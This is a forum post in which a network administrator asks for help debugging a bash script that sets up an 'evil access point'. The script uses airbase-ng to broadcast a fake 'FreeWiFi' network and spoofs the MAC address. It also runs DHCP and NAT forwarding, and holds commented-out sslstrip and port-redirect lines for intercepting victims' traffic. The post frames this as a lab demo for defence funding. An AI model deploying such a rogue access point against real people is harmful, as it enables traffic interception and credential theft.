I've demoed some of the tools on Kali with my management in order to get funding for new pieces of hardware and software to combat "rogue elements" on the corporate network. Right now I'm working on a proposal to fund the purchase of Motorola AirDefense and as part of this I'm trying to set up a simple "evil access point". I'm working in my home lab ATM and am having issues with the script for this.
(I prefer to use shell scripts over GUI tools because the management seems to respond better to seeing text fly by instead of GUI tools... go figure).
A while back I tried doing this under Backtrack, but couldn't get it working quite right. I dug up the old script I was working with, which IIRC was either one I downloaded or something hacked together from different scripts, but either way I never got it working right.
Trying this on Kali 2 and I've made some changes from the original script
Code:
#!/bin/bash
#____[start of config]_________________________
# these two values can be overwritten using
# arguments to the command
essid="FreeWiFi"
channel="4"
subnet="192.168.100.0"
startip="192.168.100.100"
endip="192.168.100.200"
broadcast="192.168.100.255"
router="192.168.100.1"
netmask="255.255.255.0"
dns="8.8.8.8"
#____[end of config]___________________________
# override the default essid if one is provided
if [[ ! -z ${1} ]]; then
essid="${1}"
fi
# override the default channel if one is provided
if [[ ! -z ${2} ]]; then
channel="${2}"
fi
function clear_iptables {
iptables --flush
iptables --table nat --flush
iptables --table nat --delete-chain
iptables --delete-chain
}
function cleanup {
echo "* cleaning up"
killall sslstrip
killall dhcpd
rm -rf /tmp/dhcpd
rm -f /tmp/dhcpd.conf
ifconfig at0 down
killall airbase-ng
clear_iptables
echo "* end of script"
exit 0
}
trap cleanup INT
echo "* creating dummy dhcpd.conf"
cat << EOF > /tmp/dhcpd.conf
ddns-update-style standard;
default-lease-time 600;
max-lease-time 7200;
subnet ${subnet} netmask ${netmask} {
option subnet-mask ${netmask};
option broadcast-address ${broadcast};
option routers ${router};
option domain-name-servers ${dns};
range ${startip} ${endip};
}
EOF
echo "* starting airbase-ng essid ${essid} on channel ${channel}"
airbase-ng -e "${essid}" -q -c ${channel} wlan0mon &
sleep 3
echo "* spoofing MAC address for at0"
ifconfig at0 down
macchanger -m 00:17:3F:03:13:37 at0
echo "* bringing up at0 and setting route"
ifconfig at0 up
ifconfig at0 ${router} netmask ${netmask}
route add -net ${subnet} netmask ${netmask} gw ${router}
echo "* starting dhcpd"
mkdir -p /tmp/dhcpd
touch /tmp/dhcpd/dhcpd.leases
chown -R dhcpd:dhcpd /tmp/dhcpd
dhcpd -q -cf /tmp/dhcpd.conf -pf /tmp/dhcpd/dhcpd.pid -lf /tmp/dhcpd/dhcpd.leases at0
echo "* setting up forwarding rules"
clear_iptables
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
# mygw=$(grep nameserver /etc/resolv.conf | head -1 | cut -d" " -f2)
# echo "* using ${mygw} as gateway"
# iptables --table nat --append PREROUTING --protocol udp --dport 53 -j DNAT --to ${mygw}
#
# iptables -t nat -D PREROUTING 1
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
# uncomment these two lines to turn on sslstrip
# echo "* starting sslstrip and logging results to log.txt"
# sslstrip -f -k -w log.txt &
echo "* setup complete, now we wait for connections"
echo "* enter CTRL-C to quit and cleanup"
while :; do
sleep 60
done;
I can't pinpoint where this is going wrong. I can connect to the AP, but I'm not receiving an IP address via dhcp. I want to be able to connect to the AP and have internet access through it for any client connected to it to simulate a person standing up an malicious AP where the victim is completely unaware that they're at risk of being compromised. It also serves to strengthen my argument against our guest network being wide open so I can clamp down on unfettered access to it.